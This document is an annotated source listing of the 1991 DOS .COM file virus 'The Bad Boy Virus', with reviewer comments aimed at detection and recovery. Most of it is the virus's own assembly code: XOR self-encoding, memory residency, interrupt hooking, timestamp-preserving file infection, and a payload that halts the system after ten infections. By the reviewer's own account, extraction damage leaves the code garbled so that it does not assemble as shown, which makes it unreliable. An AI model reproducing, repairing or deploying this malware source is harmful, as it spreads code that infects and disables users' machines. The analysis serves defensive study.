; Analyst overview (review annotation; every code line below is unchanged).
; Source listing of a 16-bit DOS .COM file infector that names itself in its
; own strings as "The Bad Boy Virus" (1991). MASM-style syntax; all numeric
; literals are hexadecimal (.radix 16); image origin is 100h.
; NOTE(review): this copy was damaged by text extraction. Operators inside
; address expressions appear to be missing ("Table 2", "DI 11"), some lines
; are merged and identifier case is inconsistent, so it does not assemble
; as shown. Read operand expressions with that in mind.
; Layout visible in the listing: entry stub and data, a table of eight module
; offsets and sizes (TABLE), an XOR coder (MOD_1), a memory installer that
; copies the modules in shuffled order (MOD_2), interrupt hooking (MOD_3),
; host restore (MOD_4), a message-and-halt payload (MOD_5), an INT 24h
; handler (MOD_6), an INT 21h handler (MOD_7) and the file infector (MOD_8).
; Detection note: MOD_2 and MOD_8 both compare the first 0Bh bytes at 100h
; against a candidate to recognise an existing copy, so those bytes are the
; code's own self-recognition marker in memory and at the start of files.
Code segment
Assume CS: Code, DS: Code
.radix 16
ORG 100
; Entry point. Pushes a table entry as the return address, sets DS = CS and
; jumps through the first table entry.
; NOTE(review): entry 0 is declared as False_Mod_1 in this listing; that
; routine rewrites entry 0 to MOD_1 and returns, presumably so this
; first-generation copy skips decoding. Confirm.
Start:
Push Word PTR CS: [Table 2]
Push CS
POP DS
JMP Word PTR CS: [TABLE]; Go to Module 1
; Working storage. Curofs is the running destination offset used by MOD_2
; while it copies modules.
Curofs dw?
Files DB 0; Number of Infected Files from this Copy
FSIZE DW 2; SIZE OF INFECTED FILE
; File time and date captured by MOD_8 and written back after infection.
FTIME DW?
FDATE DW?
; Saved far pointers: STDINT21 is filled in by MOD_3 and used for the write
; calls in MOD_8; Oldint21 is the INT 21h vector found at install time;
; Oldint13 and Oldint24 hold vectors that are swapped in and out.
STDINT21 DD?
Oldint13 DD?
Oldint21 DD?
Oldint24 DD?
; ------------- Table with Module Parameters --------------------
; Sixteen words: the first eight are module offsets (table offsets 00-0E),
; the last eight are the matching module sizes (table offsets 10-1E). All
; inter-module transfers in this file go indirectly through these entries,
; which is what lets MOD_2 place the modules in a different order in the
; resident copy and patch only this table.
; Analysis note: because module order can differ between copies, a byte
; signature spanning more than one module is unreliable. Matching inside a
; single module, or on the entry stub, is not affected by the reordering.
TABLE:
DW Offset False_Mod_1; 00
DW Offset MOD_2; 02
DW Offset Mod_3; 04
DW Offset MOD_4; 06; Offset Modules
DW offset mod_5; 08
DW Offset MOD_6; 0A
DW Offset Mod_7; 0C
DW Offset MOD_8; 0E
DW Offset Mod_2 - Offset MOD_1; 10
DW Offset Mod_3 - Offset MOD_2; 12
DW Offset Mod_4 - Offset MOD_3; 14
DW Offset Mod_5 - Offset MOD_4; 16
DW Offset Mod_6 - Offset MOD_5; 18; Size Modules
DW Offset Mod_7 - Offset MOD_6; 1A
DW Offset MOD_8 - Offset MOD_7; 1C
DW Offset MyEnd - Offset MOD_8; 1E
; ------------- Module - 1 - CODER / DECODER ----------------------
; Symmetric byte-wise XOR coder: one pass encodes the selected modules, a
; second pass decodes them. It processes six table entries starting from
; the one loaded into BX below, stepping over the entry tested by the CMP,
; and XORs each byte of a module with AL. AX was just loaded from the table
; entry, so the key is the low byte of the module's own offset.
; NOTE(review): "Table 2", "Table 0A" and "[BX 10]" have presumably lost a
; '+'. Read that way the walk starts at module 2, the skipped entry is
; module 6, and [BX+10] is the size half of the table. Confirm against an
; intact copy.
; Analysis note: on that reading the entry stub, the table, this coder and
; module 6 (which carries a plaintext identification string) are never
; transformed by this routine.
; Clobbers AX, BX, CX and flags; BX and CX of the outer loop are preserved
; across the inner loop via the stack.
MOD_1:
MOV BX, Offset Table 2; First Module to Working (Module 2)
MOV CX, 6; Number of Modules to Working
MOD_1_LP1:
; Step over the one table entry that must stay unencoded.
CMP BX, Offset Table 0A
JNE MOD_1_CONT
Add bx, 2
MOD_1_CONT:
Push bx
PUSH CX
MOV AX, [BX]; AX - Offset Module
MOV CX, [BX 10]; CX - SIZE OF MODULE
MOV BX, AX
; Inner loop: XOR CX bytes starting at the module offset. MOD_2 patches one
; byte of this instruction in a new copy ("Change Code Method").
MOD_1_LP2:
XOR BYTE PTR [BX], Al
Inc BX
Loop mod_1_lp2
POP CX
POP BX
Add bx, 2
LOOP MOD_1_LP1
RET
; ------------- Module - 2 - Mutation To Memory -----------------
; Residency check and installer. Builds a resident copy in a segment carved
; from the top of the program's memory block, placing the eight modules in
; an order chosen by MOD_2_RND and rewriting the copy's table to match.
; Analysis note: the visible side effects are a smaller final memory control
; block and a lowered top-of-memory word in the PSP, with code living above
; that boundary without a DOS allocation of its own.
MOD_2:
; Installation check: ES is loaded from CS:[2] and 0Bh bytes at ES:100 are
; compared with the running copy's bytes at DS:100.
MOV ES, CS: [2]; Memory Size
MOV Di, 100
MOV Si, 100
MOV CX, 0BH
REPE CMPSB
JNE MOD_2_INSTALL; JUMP IF NOT INSTALL
JMP Word PTR CS: [Table 06]; if Install, Jump To Module 4
MOD_2_INSTALL:
; Installation: DS = CS - 1 addresses the paragraph just below the program
; segment; the code proceeds only when the byte at DS:[0] is 'Z'.
; NOTE(review): presumably this is the DOS memory control block and 'Z'
; marks the last block in the chain, as the original comment says.
MOV AX, CS
Dec AX
MOV DS, AX
CMP BYTE PTR DS: [0], 'Z'
JE MOD_2_CONT
; NOTE(review): the MOD_2_CONT label appears to have been merged into the
; comment on the next line by extraction.
JMP Word PTR CS: [Table 6]; if NO Last MCB - Go to MOD4MOD_2_CONT:
; Shrink the block size word at DS:[3] and the word at DS:[12] by 0C0h, and
; point ES at the freed region.
; NOTE(review): if these are paragraph counts, 0C0h paragraphs is 0C00h
; bytes (3 KB), not the 2K stated in the original comment. Confirm.
Sub Word PTR DS: [3], 0C0
MOV AX, ES
SUB AX, 0C0
Mov ES, AX
Mov Word PTR DS: [12], AX; Decrement Memory Size with 2K
Push CS
POP DS
MOD_2_MUT:
; Reset the infection counter, then copy everything from 100h up to MOD_1
; (entry stub, data and table) to the same offsets in the new segment.
MOV BYTE PTR CS: FILES, 0
MOV Di, 100
MOV CX, Offset MOD_1-100
MOV Si, 100
Rep Movsb; Write Table to New Memory
; Toggle one byte inside the coder's XOR instruction (located through table
; entry 0) so that the next generation is encoded differently.
; NOTE(review): the exact byte depends on the damaged expression on the
; "Add bx" line; not determinable from this copy.
MOV BX, Word PTR CS: [Table]
Add bx, offset mod_1_lp2-offset mod_1 1
XOR BYTE PTR [BX], 18; Change Code Method
MOV CX, 8
Mov Word Ptr Curofs, Offset MOD_1
; Copy loop, eight iterations: pick an unused table entry, copy that module
; to ES:Curofs, store its new offset in the copy's table, advance Curofs,
; and flag the entry as used by setting bit 8000h in the local table.
MOD_2_LP1:
PUSH CX
Call mod_2_rnd; Generate Random Module Addres
Push bx; addres in table returned from mod_2_rnd
MOV AX, [BX]; Offset Module
Push AX
Add BX, 10
MOV CX, [BX]; Length of Module
POP Si
POP BX
XCHG DI, CUROFS
Mov Word PTR ES: [BX], DI; Change Module Offset In Table
Rep Movsb; Copy Module To New Memory
XCHG DI, CUROFS; Change Current Offset in New Memory
MOV AX, 8000
Or Word PTR [BX], AX; Mark Module - Used
POP CX
LOOP MOD_2_LP1
; Clear the "used" bit on all eight local offset entries again (AX = 7FFFh
; after NOT; CH is already zero because the LOOP above ran CX down to 0).
MOV CL, 8
NOT AX
MOV BX, Offset Table
MOD_2_LP2:
And Word PTR [BX], AX; Unmark All Modules
Add bx, 2
LOOP MOD_2_LP2
JMP Word PTR CS: [Table 4]; Go to Module 3
; Helper for MOD_2: returns in BX the address of a table offset entry whose
; "used" bit (8000h) is clear. The index is taken from the word at 0000:046C
; masked to 0-7; the routine re-reads that word until an unused entry comes
; up, so it spins until the value changes.
; NOTE(review): 0000:046C is presumably the BIOS timer tick counter. Confirm.
; Preserves CX and ES; clobbers BX and flags.
MOD_2_RND:
PUSH CX
Push ES
XOR CX, CX
MOV ES, CX
MOD_2_LP3:
MOV BX, ES: [46C]
; Hand-encoded instruction bytes; the original comment gives the mnemonic.
DB 81, 0E3, 07, 00; And BX, 7
SHL BX, 1
Add bx, Offset Table
Test [bx], 8000
JNZ MOD_2_LP3
POP ES
POP CX
RET
; ------------- Module - 3 - SET Interrupt Vector ---------------
; Runs with ES = the new resident segment. Saves the current INT 21h vector
; from the interrupt table at segment 0, records a second INT 21h entry
; point in stdint21, points the INT 21h vector at the resident copy, and
; obtains an INT 13h entry point through INT 2Fh.
; Analysis note: keeping separate "original" INT 21h and INT 13h entry
; points lets later file writes bypass handlers that other resident software
; chained in afterwards. A monitor relying only on vector hooks would not
; see those calls.
MOD_3:
XOR AX, AX
MOV DS, AX
MOV AX, DS: [4 * 21]
Mov Word PTR ES: [Oldint21], AX
MOV AX, DS: [4 * 21 2]
MOV Word PTR ES: [Oldint 21 2], AX
; INT 21h AH=30h returns the DOS version in AX; the value 1E03 selects the
; special case below.
; NOTE(review): 1E03 presumably means DOS 3.30 (AL=03, AH=1E). Confirm.
Mov Ah, 30
Int 21
CMP AX, 1E03
JNE MOD_3_GETVEC
; Special case: use a hard-coded offset (1460) paired with the segment that
; INT 2Fh AX=1203 returns in DS.
; NOTE(review): presumably the DOS kernel's own INT 21h entry for that one
; version. Confirm.
Mov Word PTR ES: [stdint21], 1460
MOV AX, 1203
Push DS
INT 2F
Mov Word PTR ES: [stdint21 2], DS
POP DS
JMP MOD_3_SETVEC
; Any other version: stdint21 is simply the current INT 21h vector.
MOD_3_GETVEC:
MOV AX, DS: [4 * 21]
Mov Word PTR ES: [stdint21], AX
; NOTE(review): two instructions share the next line (extraction artifact).
MOV AX, DS: [4 * 21 2] MOV Word PTR ES: [stdint21 2], AX
MOD_3_SETVEC:
; Install the hook with interrupts disabled: INT 21h now points at the
; resident copy's table entry 0C (module 7) in segment ES.
CLI
MOV AX, Word PTR ES: [Table 0C]
MOV DS: [4 * 21], AX
MOV AX, ES
MOV DS: [4 * 21 2], AX
STI
; INT 2Fh AH=13h is called twice; the DS:DX returned by the first call is
; stored as Oldint13 in the resident segment (saved in CX, since ES is
; changed by the call).
; NOTE(review): the second call presumably undoes the first so that the
; system state is unchanged. Confirm.
MOV CX, ES
MOV AH, 13;
INT 2F;
Push ES;
MOV ES, CX;
Mov Word Ptr Es: [Oldint13], DX; Get Standart INT13 Addres
MOV Word PTR ES: [Oldint13 2], DS;
POP ES;
INT 2F;
JMP Word PTR CS: [Table 06]; Go to Module 4
; ------------- Module - 4 - Restore Old Program Code & Start ----
; Returns control to the infected program. A short stub (MOD_4_CONT up to
; MOD_5) is first copied to an address derived from FSIZE and MyEnd, and
; entered with RET; the stub then copies the saved original bytes back to
; 100h and jumps there. The stub has to run from elsewhere because the copy
; to 100h overwrites the region this module occupies.
; Analysis note: the host's original leading bytes are kept after the end of
; the original file contents, which is where recovery of an infected file
; would find them (see MOD_8, which writes them there).
MOD_4:
Push CS
Push CS
POP DS
POP ES
; SI = this module's current offset (from the table) plus the stub's
; distance from MOD_4, so the copy works wherever the module was placed.
Mov Si, Word PTR CS: [Table 06]
Add Si, Offset MOD_4_CONT - OFFSET MOD_4
MOV DI, CS: FSIZE
Add Di, Offset MyEnd 1
; The pushed DI is the address the RET below transfers to.
Push di
MOV CX, OFFSET MOD_5 - Offset MOD_4_CONT
CLD
REP MOVSB
RET
MOD_4_CONT:
; Source of the saved host bytes: FSIZE + 100h, but never below the address
; formed on the CMP line.
Mov Si, CS: fsize
Add Si, 100
CMP Si, Offset MyEnd 1
JNC MOD_4_CNT
MOV Si, Offset MyEnd 1
MOD_4_CNT:
MOV Di, 100
MOV CX, Offset MyEnd-100
REP MOVSB
; Transfer to 100h through the stack (push the address, then RET).
MOV AX, 100;
Push ax; JMP 100
Ret;
; ------------- Module - 5 - Special Program ---------------------
; Payload. Prints MSG with INT 21h AH=09h ('$'-terminated string), then
; disables interrupts and halts the CPU. MOD_8 calls this module when the
; Files counter reaches 0A.
; DX is built from this module's table entry plus MSG's distance from MOD_5,
; so the string is found wherever the module was placed.
; Analysis note: this module lies inside the range that MOD_1 encodes, so
; whether the message text is visible in an infected file depends on that
; encoding. Do not rely on it as a plain-text indicator without checking.
MOD_5:
MOV AH, 9
MOV DX, Word PTR [Table 8]
Add dx, offset msg-offset mod_5
Push CS
POP DS
Int 21
CLI
HLT
; CR, LF, text, two BEL characters (7), terminator.
MSG DB 0DH, 0A, 'The Bad Boy Halt Your System ...', 7, 7, '$'
; ------------- Module - 6 - INT 24 Header -----------------------
; Replacement critical-error (INT 24h) handler, installed by MOD_7 for the
; duration of an infection attempt. It returns AL = 3 without prompting.
; NOTE(review): AL = 3 is presumably the "fail the call" response, which
; would suppress the usual Abort/Retry prompt (for example on a
; write-protected disk). Confirm.
MOD_6:
MOV Al, 3
Iret
; Identification string stored after the handler; never referenced by code
; in this listing. The table entry for this module is the one MOD_1 steps
; over.
; NOTE(review): if so, the string stays readable in encoded copies and is a
; usable static indicator. Confirm against a sample.
DB 'The Bad Boy Virus, CopyRight (C) 1991.', 0
; ------------- Module - 7 - INT 21 Header -----------------------
; Resident INT 21h handler. Every call other than AX=4B00 is passed straight
; to the saved handler. On AX=4B00 it temporarily replaces the INT 24h
; vector, opens the file named by the caller's DS:DX, hands the handle to
; module 8, closes the file, restores INT 24h, and then chains to the saved
; handler so the original request still runs.
; NOTE(review): AX=4B00 is presumably the DOS load-and-execute request, so
; infection is triggered by running a program. Confirm.
; Saves and restores BX, SI, DI, ES and AX around its own work.
MOD_7:
Push bx
Push Si
Push di
Push ES
Push AX
CMP AX, 4B00
JE MOD_7_BEGIN
JMP MOD_7_EXIT
MOD_7_BEGIN:
; Save the current INT 24h vector into Oldint24 (two MOVSW from 0:4*24) and
; point INT 24h at this copy's table entry 0A in segment CS.
Push DS
PUSH CS;
POP ES;
XOR AX, AX;
MOV DS, AX;
MOV Si, 4 * 24;
MOV DI, OFFSET OLDINT24;
Movsw; Change Int24 Vector
Movsw;
MOV AX, Word PTR CS: [Table 0A];
CLI;
MOV DS: [4 * 24], AX;
MOV AX, CS;
MOV DS: [4 * 24 2], AX;
STI
POP DS
; Open the file (AX=3D00) through the saved INT 21h handler.
; NOTE(review): the other calls through Oldint21 in this file are preceded
; by PUSHF; here that word appears only inside the trailing comment, which
; looks like an extraction artifact.
MOV AX, 3D00; PUSHF;
Call CS: Oldint21;
JC MOD_7_EX; Open, Infect, Close File
MOV BX, AX;
MOD_7_INFECT:;
; Call module 8 with BX = file handle; its carry result is kept on the stack
; across the close (AH=3E) and tested afterwards.
Call Word PTR CS: [Table 0e];
Pushf
Mov AH, 3E;
Pushf;
Call CS: Oldint21;
POPF
JC MOD_7_EX
; Module 8 returned with carry clear: swap the INT 13h vector with the value
; held in Oldint13 again, reversing the exchange module 8 performed.
Push DS;
CLI;
XOR AX, AX;
MOV DS, AX;
MOV AX, Word PTR CS: [Oldint13];
XCHG AX, Word PTR DS: [4 * 13];
Mov Word PTR CS: [Oldint13], AX; Exchange INT13 VECTORS
MOV AX, Word PTR CS: [Oldint13 2];
XCHG AX, Word PTR DS: [4 * 13 2];
MOV Word PTR CS: [Oldint13 2], AX;
STI;
POP DS;
MOD_7_EX:
; Put the saved INT 24h vector back.
Push DS;
XOR AX, AX;
MOV DS, AX;
MOV AX, Word PTR CS: Oldint 24;
MOV DS: [4 * 24], AX;
MOV AX, Word PTR CS: Oldint24 2; Restore Int24 Vector
MOV DS: [4 * 24 2], AX;
POP DS;
MOD_7_EXIT:
; Restore the caller's registers and continue in the saved INT 21h handler.
POP AX
POP ES
POP DI
POP Si
POP BX
JMP CS: Oldint 21
; ------------- Module - 8 - Infecting (Bx - File Handle) --------
; File infector, called by MOD_7 with BX = handle of a file opened for
; reading. Returns with carry set when the file was skipped (MOD_8_EXIT) and
; carry clear otherwise (MOD_8_EXT).
; Steps visible below: locate the handle's system file record through
; INT 2Fh; skip files of size 0F000 or more; switch the record's open mode
; to read/write; save size, time and date; read the first MyEnd-100 bytes;
; skip files starting with 'MZ' or 'ZM' and files whose first 0Bh bytes
; match this code; write the encoded body over the start of the file; write
; the saved original bytes at the old end of file; restore time and date.
; Analysis notes for detection and recovery:
;  - an infected file keeps its original timestamp, so modification time is
;    not a reliable indicator; file size grows by the number of bytes read;
;  - the original leading bytes sit at the former end of file;
;  - the open mode is changed inside the DOS file record rather than by
;    reopening, and writes go through stdint21 with INT 13h swapped, so
;    hooks on the normal vectors may not observe them.
; NOTE(review): the record offsets ("DI 2", "DI 0DH", "DI 0F", "DI 11",
; "DI 15") have presumably lost a '+'; their meanings are taken from the
; original comments.
MOD_8:
PUSH CX
Push dx
Push DS
Push ES
Push di
Push BP
Push bx
; INT 2Fh AX=1220 then AX=1216, using the byte at ES:[DI] from the first
; call as BX for the second; ES:DI afterwards addresses the file record.
MOV AX, 1220
INT 2F
MOV BL, ES: [DI]
XOR BH, BH
MOV AX, 1216
INT 2F
POP BX
; Size gate: continue only when the size word is below 0F000.
MOV AX, Word PTR ES: [Di 11]
CMP AX, 0F000
JC MOD_8_C
JMP MOD_8_EXIT
MOD_8_C:
MOV Word PTR ES: [DI 2], 2; Open Mode - R / W
MOV AX, ES: [DI 11]
MOV CS: Fsize, Ax; Save File Size
MOV AX, Word PTR ES: [DI 0DH];
Mov Word PTR CS: [FTIME], AX; Save File Date / Time
MOV AX, Word PTR ES: [DI 0F];
MOV Word PTR CS: [FDATE], AX;
; Read (AH=3F) the start of the file into the buffer after MyEnd.
PUSH CS;
POP DS;
MOV DX, OFFSET MYEND 1;
MOV CX, Offset MyEnd-100; Read First Bytes
MOV AH, 3F;
Pushf
Call CS: Oldint21
JNC MOD_8_CNT
JMP MOD_8_EXIT
MOD_8_CNT:
; BP keeps the byte count for the later write at end of file.
MOV BP, AX; AX - BYTES READ
MOV Si, DX
; Skip files whose first word is 'MZ' in either byte order.
MOV AX, 'MZ'
CMP AX, Word PTR DS: [Si]
JNE MOD_8_NXTCHK
JMP MOD_8_EXIT
MOD_8_NXTCHK:
XCHG AH, Al
CMP AX, DS: [Si]
JNE MOD_8_CNT2
JMP MOD_8_EXIT
MOD_8_CNT2:
; Already-infected check: compare 0Bh bytes of this copy at 100h with the
; bytes just read.
; NOTE(review): "MOV Di, DX" sits after the ';' on the line below, which
; looks like an extraction artifact.
Push ES
Push di
PUSH CS;
POP ES;
MOV Si, 100; MOV Di, DX; Check for Infected File
MOV CX, 0BH;
REPE CMPSB;
POP DI
POP ES
JNE MOD_8_CNT1;
JMP MOD_8_EXIT
MOD_8_CNT1:
MOV Word PTR ES: [DI 15], 0; FP: = 0
; Copy the write stub (MOD_8_CONT up to MOD_8_CONT_END) to offset 0 of this
; segment. The stub calls the coder, which transforms module 8 itself, so
; it presumably cannot run from inside the module while the body is encoded.
Push ES
Push di
MOV Si, Word PTR CS: [Table 0e]
Add Si, Offset MOD_8_CONT - OFFSET MOD_8
XOR DI, DI
Push CS
POP ES
MOV CX, OFFSET MOD_8_CONT_END - OFFSET MOD_8_CONT
CLD
REP MOVSB
POP DI
POP ES
; Build two return addresses: first the current address of MOD_8_CONT_END
; (where the stub returns to), then 0 (the stub copy, entered by the RET
; at the end of this section).
MOV Si, Word PTR CS: [Table 0e]
Add Si, Offset MOD_8_CONT_END - OFFSET MOD_8
Push Si
XOR Si, Si
Push Si
; Swap the live INT 13h vector with the value saved in Oldint13 for the
; duration of the writes; MOD_7 swaps it back.
Push DS;
CLI;
XOR AX, AX;
MOV DS, AX;
MOV AX, Word PTR CS: [Oldint13];
XCHG AX, Word PTR DS: [4 * 13];
Mov Word PTR CS: [Oldint13], AX;
MOV AX, Word PTR CS: [Oldint13 2]; Exchange INT13 VECTORS
XCHG AX, Word PTR DS: [4 * 13 2];
MOV Word PTR CS: [Oldint13 2], AX;
STI;
POP DS;
RET
MOD_8_CONT:
; Stub body (executed from its copy at offset 0): encode via table entry 0,
; write MyEnd-0FF bytes from 100h to the file (AH=40) through stdint21, then
; decode again. The write's carry flag is kept across the decode call.
Push bx
Call Word PTR CS: [TABLE]; CODE VIRUS
POP BX
MOV DX, 100;
Mov AH, 40; Write Code in Begin
MOV CX, Offset MyEnd-0FF
Pushf;
Call CS: stdint21;
Pushf
Push bx
Call Word PTR CS: [Table]; Decode Virus
POP BX
POPF
JNC MOD_8_CONT1
; Write failed: drop the pending return address and leave through
; MOD_8_EXT instead.
POP AX
MOV AX, Word PTR CS: [Table 0e]
Add Ax, Offset MOD_8_EXT - Offset MOD_8
Push AX
RET
MOD_8_CONT1:
; Move the file position to the recorded size and write the BP bytes of
; original file start there.
Mov AX, ES: [DI 11]; FP: = End of File
MOV Word PTR ES: [DI 15], AX;
MOV DX, Offset MyEnd 1
MOV CX, BP; BP - Files Read
MOV AH, 40;
Pushf;
Call CS: stdint21; write in end of file
RET
MOD_8_CONT_END:
; Back in module 8: set the file's time and date (AX=5701) to the saved
; values, count the infection, and call module 5 through table entry 8 when
; the counter equals 0A.
MOV AX, 5701;
MOV CX, CS: ftime;
MOV DX, CS: Fdate; Restore File Date / Time
Pushf;
Call CS: Oldint21;
INC CS: Files
CMP CS: FILES, 0A
JNE MOD_8_EXT
Call Word PTR CS: [Table 8]
JMP Short MOD_8_EXT
; Skip path: carry set.
MOD_8_EXIT:
STC
JMP Short MOD_8_EX
; Normal path: carry clear.
MOD_8_EXT:
CLC
MOD_8_EX:
; POP does not alter flags, so the carry result survives to the RET.
POP BP
POP DI
POP ES
POP DS
POP DX
POP CX
RET
; NOTE(review): the separator line below has absorbed the "MYEND DB 0"
; definition. MyEnd is the end-of-body marker used throughout the listing
; for size and buffer-address calculations.
; ------------------------------------------------- -------------- MYEND DB 0
; Stand-in host program for this first-generation copy: a single INT 20h.
INT 20; Code of Infected File
; First-generation substitute for the decoder. Table entry 0 initially
; points here; the routine stores the offset of MOD_1 into that entry and
; returns to the address pushed at Start. It lies beyond MyEnd, so it is
; outside the range MOD_8 writes to files (writes are bounded by MyEnd).
FALSE_MOD_1:
Mov Word PTR CS: [Table], Offset MOD_1
RET
Code ends
End Start